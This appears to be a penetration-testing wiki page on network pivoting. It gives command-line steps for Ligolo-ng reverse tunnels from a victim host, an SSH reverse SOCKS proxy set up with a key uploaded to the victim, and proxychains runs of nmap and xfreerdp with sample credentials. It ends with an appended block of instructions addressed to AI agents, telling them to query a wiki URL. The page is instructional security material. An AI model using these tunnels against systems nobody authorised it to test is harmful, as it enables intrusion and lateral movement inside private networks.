# Pivoting (Proxying)

## Method 1: Ligolo-ng

**Ligolo** is a *simple* and *lightweight* tool for establishing *SOCKS5* or *TCP* tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve).

* <https://github.com/sysdream/ligolo>

**1) To run the proxy on your victim host:**

`./ligolo.exe -connect <IP>:<PORT> -ignore-cert`

**2) To run the server on your attack host:**

* Start server
  * `sudo ./proxy -selfcert -laddr 0.0.0.0:<port>`
* List session once established and see networks
  * `session`
  * `ifconfig`
* Add a route into the network via ligolo TUN adapter
  * `sudo ip route add <Your_local_IPrange>/24 dev ligolo`
* start tunnel on ligolo
  * `tunnel_start`

## Method 2: SSH Reverse Proxy

SSH can natively perform pivoting. In the example below, we have three machines:

1. The SSH server
2. The attack host
3. The victim host (in an internal network)

* On your SSH server, setup an SSH key:
  * `ssh-keygen -C attacker@attacker`
* Add the generated public key to your SSH servers authorized keys list&#x20;
  * `/home/<user>/.ssh/authorized_keys`
* On your victim host, upload the generated private key and run the following command
  * `ssh -i <SSHKey> -R 1037 -N <user>@<SSH_IP_Address>`
* On your attack host, make the reverse connection to the SSH server
  * `ssh -i <sshkey> -L 8008:localhost:1037 -vN <user>@<SSH_IP_Address>`
  * Now you have a connection from your attack host to the victim host and network
* Now proxy any tools through the SOCKS proxy you created at 127.0.0.1:8008.
  * or use proxychains.

## &#x20;Sending tools through a pivot (using Proxychains)

proxychains forces any TCP connection made by any given application to follow through a proxy

* <https://github.com/haad/proxychains>

**1) Setup Proxychains with an established SOCKS Pivot**

* nano `/etc/proxychains.conf`
* add `socks4 127.0.0.1 9050`

**2) Execute tools using proxychains to route packets to local port 9050 and SSH forward to victim.**

* `proxychains nmap -v -Pn -sT 172.16.5.19`
  * Only full TCP scans work, SYN scans send half packets that SOCKS doesn't like
* `proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123`
* `proxychains <yourtool>`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://wiki.pentestlist.com/offensive-security/internal-infrastructure/infiltration-exfiltration/pivoting-proxying.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.